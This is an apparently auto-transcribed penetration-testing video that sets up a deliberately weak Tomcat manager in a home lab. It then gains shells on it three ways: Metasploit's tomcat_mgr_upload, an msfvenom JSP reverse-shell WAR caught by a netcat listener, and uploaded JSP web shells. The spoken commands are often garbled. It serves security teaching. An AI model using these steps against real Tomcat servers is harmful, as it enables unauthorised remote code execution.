Hello guys, welcome back to Pentester Club. Today we're going to solve another tutorial named called Tomcat Penetration Testing. So, Apache Tomcat, developed by the Apache Software Foundation. It's widely used web servers and servlet container. Originally, it served as a demonstration platform for a Java servlet and Java server pages. So, which are used in Java web applications. As time passed, a Tomcat expanded its capabilities to support additional Java web technologies. A notable feature of Tomcat is it supports a deploying a web applications using a WAR as web application archive files. These files bundle together all the components of web application, including a code, pages, and file making a deployment similar. A Tomcat allows a users to upload and run these WAR files, enabling them to host their applications on the internet. In addition, a WAR files, Tomcat also supports a deployment of JSP pages. JSP is a technology that allows a developers to create a dynamic web pages using a Java Tomcat can execute these JSP pages, making it uh, versatile of hosting a wide range of web applications. By default, a Tomcat supports the use of WAR files and JSP pages. However, the administration can configure settings and ensure the security and control over the file upload, enhancing the overall a safety of the server. So now here we are going to do here on Tomcat penetration testing. So first of all, we would like to look how we are going to set up the lab setup and installation, configuration, enumeration, exploiting using a Metasploit framework, and exploiting manually with the reverse shell, exploiting manually with the web shell, and we go for a conclusion. So first of all, we would like to go for a lab setup. So in the lab setup, so my Kali Linux machine is an attacker machine. So this is my targeted IP address. So let me just show you here. So just look here as perfect. So this is my targeted IP address. Now let's come back here in event machine is and victim machine. Now here we would like to build here as this is my victim target IP address. So now we would like to go for as installation. Now just type here as clear. Just type here as apt install. Just type here as open jdk 11 and jdk. So it's ask sudo su, enter your password. Just copy this, just type sudo apt install open jdk. There it will ask the permission, you just type yes. So it will take a little bit time to install. So let's wait for the installation. Now it was installed. Now let's wait for this. Now we was successfully installed here. Now just type here as clear. Once you just type here as clear. Now we would like to add a user by the name of a Tomcat using this command. Now we would like to add here as just type here as user add minus f minus u minus d. We just put in the opt that I put as a Tomcat minus s. Then I just put here in the bin false as a Tomcat, where I have successfully added a Tomcat. Now, we would like to open the Firefox. Now, in this case, now we just need to open here as new tab. We just type here as a Tomcat. Now, a Tomcat Apache server. This is the one. Now, you just click on uh, downloads. So I would like to download the version 10. This is okay. Now, I would like to get this a targeted one. So, even you can browse here version bin. So where is this? So we would like to select, let me just go back. Now, I would like to get this one. I just try to download this one. So where I have downloaded this one. Now I would like to go for as a downloads and I just type list. So this is an Apache Tomcat. Now where I have downloaded this one. Now let you just type here as a tab minus xvr. Then let's just paste this as Apache a Tomcat, where I have done successfully. Now just type here as clear. Now what you just need to do here is, now just type here as a list. So you just need to copy this one. Now you just need to type here as move uh, this one. Then you just put as a start entirely of this one. I need to move to an opt to a Tomcat. I have successfully moved now. You just need to give a permission. You just type here as chow minus a Tomcat. Now, where it was in the opt in the Tomcat, where I have given here. Now just type here as sh minus c. Now, I would like to give also all the permission in the Tomcat. You just type here as chmod plus x opt Tomcat. Then in the bin folder, then I specify as star. What else with the extension of sh? I just need to give all permissions. Now we have given all the permissions here. Now I just type here as cd. Now just type here as exit. Now I just type here as, here I have a Tomcat service. So you just need to create this one, Tomcat dot service. So this is a simple programming. So where you just need to create this everything. So we just need to copy this one entirely. Now I would like to type here as clear. Now just type here as list minus l in the etc system d. Now just type here as system. Now here no have a Tomcat dot service. Now just type here as clear. Now I would like to uh, move this one to as etc system d. Then you just type here as system. as a Tomcat dot service. Okay, I have mistaken. Let me just write first. Just copy, just type as sudo su. I just type first. It's also a save. Just put this, move this, just copy. Then let's just paste it here. I have successfully moved this folder. Now I just need to type, I just type it as clear. Now I just type it as system, ctr, daemon, reload. Oh, sorry, I have made a mistake. Now it was a reloaded here. Now let I just type it as system ctl enable now a tomcat. Now it was a created, now a tomcat is enabled. Now we just type it as a system ctl status a tomcat. Now it was active and running. So once it was active and running, for a confirmation, now we can check one more time. You just walk to here as 127.0.1. It's 8080. Yes, it was working now. It was active and running for us. Okay, now let's I just quit here. Now after installation successfully of the Tomcat, now it's our time to configure the Tomcat server. Okay, now what is your role here? Now let me, you just type it up. I just quit this. Now just type it as clear. And now you just type it as a nano. You just put as opt, then as a Tomcat. Then go for a configuration file. Then put here as a Tomcat users.xml. Now we would like to scroll down. So in this case, so you just need to enter here at the bottom of these things, as you just need to put as a role. You need to specify a role as a role name equal to, you just need to put as a admin GUI, admin required for a graphical user interfaces. Then you just close this. Now you just put as a role name equal to, I also required a manager GUI. Now let me just close this. Now you just put here as user, as username equal to as admin, then password equal to, so I just creating myself as a usernames and passwords for this, for both admin graphical user interfaces and all these things. Now password. Now I need to present this one as roles equal to, I just need to specify for the admin GUI as well as manager GUI. That's it. Now let's just close this. So where I have specified this one, role to a role name for admin GUI, role name to a manager GUI. So where I have specified the roles. Then after that, I just created a user and a password for these both two things, and I have assigned for that. Now, then later that you just type as Control O, Control X. That's it. Once you have done here. Now, to enable a remote access for a Tomcat Manager, now I want to connect through our attacker machine to exploit that one. Okay. For this case, now we would like to do here is we would like to go for enabling a remote access to the Tomcat Manager. Now, we would like to look here as first of all, we would like to look here as list minus here. We just put here as up a Tomcat. Now, just put as a web apps uh, manager. Just put here as meta INF. There is a content.xml. Just copy this one. Now, I just put this. Now, in this case, now let's come back here. I just put here as a nano. So first of all, I just put here as cat to read. So where we would like to delete this value until here. Okay, we don't want to get access to somewhere else. So I just need to remove this following. Okay, now I just put here as a go back to as nano. Let's come back here. I just need to remove this value. That's it. In real-time case scenarios, when you want to launch with any type of JSP application, so you just need to specify the value of your domain names or XYZ things here. Just put it here. Now, I have done in the manager, and I also need to look in the host manager. In the same case, now we would like to look here as manager. Now, in the manager place, there is also a host manager. In the same case, now just type here as, let's go back here. Now I just need to remove this. So once just type Control O, Control X. So we have successfully removed here. Now I just type here as first. I would like to look both one by one. Cat, where I have removed that. Now I just type here as clear. Cat, where I have removed that all values. Now just type here as clear. Now just type here as systemctl restart a Tomcat server. Tomcat. Now it will be restarted successfully. Now we would like to work here. Then you can refresh this. Yes, it was well and good for us now. Now in this case, now we are going for enumeration. So after everything installations and configuration is completed, now we are starting for the enumeration phase using through a kernel Linux of your attacker machine. Now we would like to work here. Now just enter your password here. Now let's just come back here. You just type here as a nmap port for 8080, then minus SP for a verbose, enter your target IP address 192.168.18.a72. Now let's see here. You can see here 8080 port Apache is open for targeted thing. Now you can look here 8080 open port for Apache Tomcat version. So If we install 11.1 also does not matter. If we install 9.1 does not matter. Choice is your wish for installation and configurations. Okay. Now we are going for exploitation using the Metasploit framework. Now let's we just type here as a clear. We just type here as MSF console. First of all, we would like to launch this Metasploit. Now Metasploit is came our task, so let it start this. Now let me just type it as clear. We just type it as use exploit multi handler. So first of all, you just need to use a multi handler. So I don't need to get this, so just type it as back. Now I just need to uh, look, I just need to search a exploit such as a Tomcat MGR upload. Where I have got this, so just type it as use 0. Now just type it as clear. Now just type it as set R hosters. Enter your targeted IP address 192.168.18.72. Set R port equal to 8080. Set HTTP username equal to admin. Set HTTP password equal to a password. That's it. Now just type here as show targets. Now just type here as set. Now I was installed this one in the Linux machine, not in the Java with the universal, not in the Windows operating system. I was installing the Linux machine as an Ubuntu, considered Ubuntu is an Linux family. So set a target to. Now let's we just type here as I just need to specify a payload also. We just type here as set a payload Linux meter preter. Then you just specify as a reverse underscore TCP. That's great. Linux. Oh, sorry. I just need to specify the value is it was x86. X86. That payload is valid right now. Now I just type here as a exploit. Now uploading and deploying a jar. So we have successfully get the meter reversal. Now just type here as sysinfo where you have got it is Ubuntu 24.0. It was hosted in the Linux 6.8.0.51. Targeted IP address, OS architecture, everything we have got it here. So this is a simple way you can exploit the Tomcat server here. Now once you can look to as another case scenario here. Now I can show you that also now. Now we would like to go back here. So this is an manual way. Now I just we have exploited here. Now just type here as shell. You just type ID. We got it as Tomcat. Now just type here as which Python you not yet. You just type here as which Python 3. You can get almost a reversal like this. Python 3 minus C. Import a pty span bin mistake bin bash. Now where I have get here everything export term equal to extra. I'll just type it as clear. Just put here as export term equal to x term. Now just type clear. Now you just look here as Tomcat. Who am I? You are in the Tomcat with the PCPL. That's it. Just type ID. You are in the Tomcat. Everything. So this is how you can get a root privilege access. So just type list minus L. There is nothing else to get it from here. Now just type cd as root, permission is deleted. You cannot able to get as root because I not given as root access over there. Now I just suspend this with this. Now we are going to exploit this one manually. Now to exploit a manually, we just need to create a, I just need to make a directory for a Tomcat, cd as a Tomcat. Now let me just create a MSFP now, payload for uh, Java. Now just type as DSP shell reverse underscore TCP. Now lhost equal to 192.168.18.122. Now L port equal to 4444 minus F in the, I would like to get web application archive. Then let's just type greater than 2 shell dot var. That's it. Now here the payload will be created. Now final size where the it was created. Now just here we have. Now we would like to open the Firefox. Now here let we just look this. Now we would like to enter our targeted IP address 192.168.18.72 and you just put here as 8080, where you just click on here as manager and enter your username as admin, password is password. That's it, where you have uploaded here. Now after logging into manager app, now you try to deploy here. Okay, now let me just put here as a browse a file. Let's go to a home directory. Where is this? A Tomcat. This is here Tomcat shell.var. Just open this. I try to deploy. Here I have a shell. Now you just need to click on this shell, open in new tab. So where I have got it here. So before that, I just need to set up a netcat listener. Okay, I have made a mistake. Now let's come back here. Now just type it as clear. Just type it as netcat minus lvnp 4444. That's it. Now let me come back here. I try to put here as open with a new link open tab. I have just connected. You just type here as ID. We have get here as connected. You just type here as I have config, where my targeted system as same in the Ubuntu machine. The exactly you have got it here in the Ubuntu machine. Let me, I can show you here. Now let's just enter your password. Now just look here. From here you just type it as exit. Now just type it as clear. You just put here as I have config. Exactly the same thing. What else is presented over there? We have gained the access here directly. That's it here. Now we have exploited manually also. Now we are going to exploit manually through a web shell. Now for that I just quit here. Now just type here as clear. Now let me just come back here as cd. I just type here as clear. Now just type here as sudo apt-get install open jdk 11 jdk. Now enter your password. Sorry, I have made a mistake here. Open JDK. Now it will ask permissions. Yes. So let it install everything from here. So once it was installed, now later we would like to try this one. So let it install this one. So now it's almost all done. Now let's see. Yes, it was done here. Now we just install the OpenJDK. After install the OpenJDK, now we just need to make a directory as a web shell. Now then go to as cd as web shell. Now we just need to make as I already have one thing here. Let me just look here index.jsp. Now I can show here as just write as cat index.jsp. This is the uh, JSP. Now I just move as a index.jsp to a web shell. Now let me just go there as clear. Just type clear. You just put as cd as web shell. Now just type as clear. Now just type plus. Now what we would like to do here is now I can show here as cat index.jsp. This as index.jsp. Now after you just type here as jar minus cdf. Then you just put here as I would like to put as a web shell dot var. Now, it was created here as webshell.var. Now, after webshell.var, file is created. Now just type list, just type webshell.var, which is here. So, where once we have created here as a file. Now, we would like to upload here as webshell. Now, we just need to go back here, try to click on this browse. Now, I just go to as home. Now, webshell.web, where here is here. Now, I can try to deploy here. So, once I have deployed this one, now just close this. Now, you just try here as open link in new tab. So, where you can see here, you can run anything from here. Now, it's not presented as index.jsp as otherwise something else. So, but I have got it as directly what I'm looking here. Now, you just type as ifconfig. Now try to run this. I have getting here my targeted IP address and everything of the same of my event machine. That's it here. Now, uh, alternative way to do above a manual here as a manual exploration. You can download as a we would like to go back here. I would like to go back here. Uh, web shell, GitHub. This one, this is a web shell open source project. Now, I would like to go back here as so. I just need to go as a manually. I just go as here as manually. 3. So push db web shell in this. I would like to look the JSP here as a comment.jsp. So it just entirely just I would like to put it this one as raw. Now you just copy this one. Copy. Now let's come back here. We just put here as cd as a web shell. Now just put as wget. Then let's just paste it here where I have got this. Now I just type here as clear. You just type here as zip minus r for reverse shell. Oh, reverse shell dot var to cmd dot jsp. So where it was created here as reverse shell dot var. Now again repeating the same procedure as we discussed again as a reverse shell dot var file. We need to deploy again this one. Now we would like to come back to here. Now we just need to click on browse from here. Now web shell reverse shell dot var, then try to deploy. Now this is a reverse shell. Now I just need to open here. So it's not supported for the status or HTTP support. So which can get the same thing as it is here also. That's it. So we have successfully completed this penetration testing on the Tomcat server. That's it. So Apache Tomcat remains a preferred choice for deploying a Java web applications, offering a blended of versatility and security that caters for the diverse need to a developer and administration alike. However, due to a misconfiguration, it can be abused to perform a certain unintended actions like a remote code executions also. That's clear. So you try it your own guys. Thank you guys for watching and keep smiling.